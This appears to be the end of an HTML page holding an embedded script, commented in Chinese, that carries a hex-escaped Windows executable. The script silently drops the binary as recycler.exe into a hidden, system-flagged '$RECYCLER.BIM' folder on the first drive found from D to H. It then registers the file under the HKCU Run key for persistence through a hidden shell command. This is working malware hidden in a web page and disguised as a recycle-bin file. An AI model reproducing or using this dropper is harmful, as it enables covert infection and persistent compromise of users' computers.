\x6d\x5f\x65\x00\x0c\x03\x5f\x69\x6e\x69\x74\x74\x65\x72\x6d\x00\x09\x02\x5f\x5f\x77\x69\x6e\x69\x74\x65\x6e\x76\x00\x00\xa2\x02\x5f\x66\x6d\x6f\x64\x65\x00\x00\x3f\x02\x5f\x63\x6f\x6d\x6d\x6f\x64\x65\x00\x00\x50\x02\x5f\x63\x72\x74\x5f\x64\x65\x62\x75\x67\x67\x65\x72\x5f\x68\x6f\x6f\x6b\x00\x00\xac\x01\x5f\x5f\x63\x72\x74\x55\x6e\x68\x61\x6e\x64\x6c\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x00\xab\x01\x5f\x5f\x63\x72\x74\x54\x65\x72\x6d\x69\x6e\x61\x74\x65\x50\x72\x6f\x63\x65\x73\x73\x00\x35\x01\x3f\x74\x65\x72\x6d\x69\x6e\x61\x74\x65\x40\x40\x59\x41\x58\x58\x5a\x00\xa9\x01\x5f\x5f\x63\x72\x74\x53\x65\x74\x55\x6e\x68\x61\x6e\x64\x6c\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x46\x69\x6c\x74\x65\x72\x00\x00\x94\x03\x5f\x6c\x6f\x63\x6b\x00\x04\x05\x5f\x75\x6e\x6c\x6f\x63\x6b\x00\x2e\x02\x5f\x63\x61\x6c\x6c\x6f\x63\x5f\x63\x72\x74\x00\xae\x01\x5f\x5f\x64\x6c\x6c\x6f\x6e\x65\x78\x69\x74\x00\x3a\x04\x5f\x6f\x6e\x65\x78\x69\x74\x00\x14\x03\x5f\x69\x6e\x76\x6f\x6b\x65\x5f\x77\x61\x74\x73\x6f\x6e\x00\x00\x43\x02\x5f\x63\x6f\x6e\x74\x72\x6f\x6c\x66\x70\x5f\x73\x00\x00\x7a\x02\x5f\x65\x78\x63\x65\x70\x74\x5f\x68\x61\x6e\x64\x6c\x65\x72\x34\x5f\x63\x6f\x6d\x6d\x6f\x6e\x00\x21\x01\x45\x6e\x63\x6f\x64\x65\x50\x6f\x69\x6e\x74\x65\x72\x00\x67\x03\x49\x73\x44\x65\x62\x75\x67\x67\x65\x72\x50\x72\x65\x73\x65\x6e\x74\x00\x6d\x03\x49\x73\x50\x72\x6f\x63\x65\x73\x73\x6f\x72\x46\x65\x61\x74\x75\x72\x65\x50\x72\x65\x73\x65\x6e\x74\x00\x2d\x04\x51\x75\x65\x72\x79\x50\x65\x72\x66\x6f\x72\x6d\x61\x6e\x63\x65\x43\x6f\x75\x6e\x74\x65\x72\x00\x0a\x02\x47\x65\x74\x43\x75\x72\x72\x65\x6e\x74\x50\x72\x6f\x63\x65\x73\x73\x49\x64\x00\x0e\x02\x47\x65\x74\x43\x75\x72\x72\x65\x6e\x74\x54\x68\x72\x65\x61\x64\x49\x64\x00\x00\xd6\x02\x47\x65\x74\x53\x79\x73\x74\x65\x6d\x54\x69\x6d\x65\x41\x73\x46\x69\x6c\x65\x54\x69\x6d\x65\x00\xfe\x00\x44\x65\x63\x6f\x64\x65\x50\x6f\x69\x6e\x74\x65\x72\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e\x64\x6c\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4e\xe6\x40\xbb\xb1\x19\xbf\x44\x01\x00\x00\x00\x00\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\x00\x18\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x30\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x09\x04\x00\x00\x48\x00\x00\x00\x60\x40\x00\x00\x7d\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x27\x31\x2e\x30\x27\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x27\x55\x54\x46\x2d\x38\x27\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x27\x79\x65\x73\x27\x3f\x3e\x0d\x0a\x3c\x61\x73\x73\x65\x6d\x62\x6c\x79\x20\x78\x6d\x6c\x6e\x73\x3d\x27\x75\x72\x6e\x3a\x73\x63\x68\x65\x6d\x61\x73\x2d\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2d\x63\x6f\x6d\x3a\x61\x73\x6d\x2e\x76\x31\x27\x20\x6d\x61\x6e\x69\x66\x65\x73\x74\x56\x65\x72\x73\x69\x6f\x6e\x3d\x27\x31\x2e\x30\x27\x3e\x0d\x0a\x20\x20\x3c\x74\x72\x75\x73\x74\x49\x6e\x66\x6f\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x75\x72\x6e\x3a\x73\x63\x68\x65\x6d\x61\x73\x2d\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2d\x63\x6f\x6d\x3a\x61\x73\x6d\x2e\x76\x33\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x73\x65\x63\x75\x72\x69\x74\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x72\x65\x71\x75\x65\x73\x74\x65\x64\x50\x72\x69\x76\x69\x6c\x65\x67\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x65\x71\x75\x65\x73\x74\x65\x64\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x4c\x65\x76\x65\x6c\x20\x6c\x65\x76\x65\x6c\x3d\x27\x61\x73\x49\x6e\x76\x6f\x6b\x65\x72\x27\x20\x75\x69\x41\x63\x63\x65\x73\x73\x3d\x27\x66\x61\x6c\x73\x65\x27\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x65\x71\x75\x65\x73\x74\x65\x64\x50\x72\x69\x76\x69\x6c\x65\x67\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x73\x65\x63\x75\x72\x69\x74\x79\x3e\x0d\x0a\x20\x20\x3c\x2f\x74\x72\x75\x73\x74\x49\x6e\x66\x6f\x3e\x0d\x0a\x3c\x2f\x61\x73\x73\x65\x6d\x62\x6c\x79\x3e\x0d\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x30\x01\x00\x00\x01\x30\x07\x30\x0c\x30\x12\x30\x1e\x30\x33\x30\x3f\x30\x45\x30\x57\x30\x61\x30\x6a\x30\x74\x30\x7a\x30\x83\x30\x89\x30\x8e\x30\x93\x30\x98\x30\xa0\x30\xa5\x30\xb7\x30\xbf\x30\xc5\x30\xd1\x30\xdc\x30\xe5\x30\xef\x30\xf6\x30\xfc\x30\x01\x31\x06\x31\x0b\x31\x10\x31\x16\x31\x1e\x31\x32\x31\x4c\x31\x6c\x31\x7e\x31\x86\x31\x8b\x31\x90\x31\xb2\x31\xb8\x31\xbf\x31\xc4\x31\xd1\x31\xe0\x31\xe8\x31\xf0\x31\x04\x32\x0a\x32\x0f\x32\x17\x32\x1d\x32\x23\x32\x30\x32\x36\x32\x40\x32\x5f\x32\x65\x32\x6f\x32\x75\x32\x7e\x32\x83\x32\xa3\x32\xaa\x32\xbd\x32\xf5\x32\xfb\x32\x01\x33\x07\x33\x0d\x33\x13\x33\x1a\x33\x21\x33\x28\x33\x2f\x33\x36\x33\x3d\x33\x44\x33\x4c\x33\x54\x33\x5c\x33\x68\x33\x71\x33\x76\x33\x7c\x33\x86\x33\x90\x33\xa0\x33\xb0\x33\xc0\x33\xc9\x33\x18\x34\x28\x34\x2e\x34\x96\x34\x9b\x34\xad\x34\xcb\x34\xdf\x34\xe5\x34\x90\x35\xab\x35\xb7\x35\xc6\x35\xcf\x35\xdc\x35\x0b\x36\x13\x36\x22\x36\x33\x36\x3e\x36\x43\x36\x48\x36\x5f\x36\x6e\x36\x74\x36\x87\x36\x9c\x36\xa7\x36\xbd\x36\xd7\x36\xe1\x36\x1d\x37\x22\x37\x3d\x37\x42\x37\x84\x37\x8a\x37\x91\x37\xae\x37\xf9\x37\xfe\x37\x0e\x38\x14\x38\x1a\x38\x20\x38\x26\x38\x2c\x38\x32\x38\x38\x38\x3e\x38\x44\x38\x4a\x38\x50\x38\x00\x00\x00\x20\x00\x00\x24\x00\x00\x00\xa0\x30\xac\x30\xb0\x30\xb4\x30\xf8\x30\xfc\x30\x54\x31\x58\x31\x0c\x32\x10\x32\x2c\x32\x30\x32\x50\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

// 可执行文件释放路径
var code_name = "recycler.exe"
var dir_name = "$RECYCLER.BIM"

// 寻找一个盘符
var drive_name = "";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var hasDriveD = fso.DriveExists("d"); // 检查是否有D盘
if (hasDriveD) drive_name = "d";
else {
	var hasDriveE = fso.DriveExists("e"); // 检查是否有E盘
	if (hasDriveE) drive_name = "e";
	else {
		var hasDriveF = fso.DriveExists("f"); // 检查是否有F盘
		if (hasDriveF) drive_name = "f";
		else {
			var hasDriveG = fso.DriveExists("g"); // 检查是否有G盘
			if (hasDriveG) drive_name = "g";
			else {
				var hasDriveH = fso.DriveExists("h"); // 检查是否有H盘
				if (hasDriveH) drive_name = "h";
			}
		}
	}
}

if (drive_name.length > 0) {
	var root_path = drive_name + ":\\" + dir_name;
	var code_path = root_path + "\\" + code_name;
	var folderExist = fso.FolderExists(root_path);	// 判断是否存在
	if (!folderExist) {
		fso.CreateFolder(root_path);	// 创建一个目录
	}

	var folder = fso.GetFolder(root_path);
	if (folder) {
		folder.Attributes = 4+2;

		// 释放可执行文件
		var stream = new ActiveXObject("ADODB.Stream");
		var adTypeBinary=1,adTypeText=2;
		stream.Type = adTypeText;
		stream.CharSet = "iso-8859-1";
		stream.Open();
		stream.WriteText(code_context);
		stream.SaveToFile(code_path, 2);
		stream.Close();
		stream = null;

		// 注册自启动
		var file = fso.GetFile(code_path);
		if (file) {
			var shell = new ActiveXObject("WScript.Shell");
			shell.Run("reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v test /t REG_SZ /d " + code_path + " /f", 0, true);
		}
	}
	
}

--> 
</SCRIPT>

</body>
</html>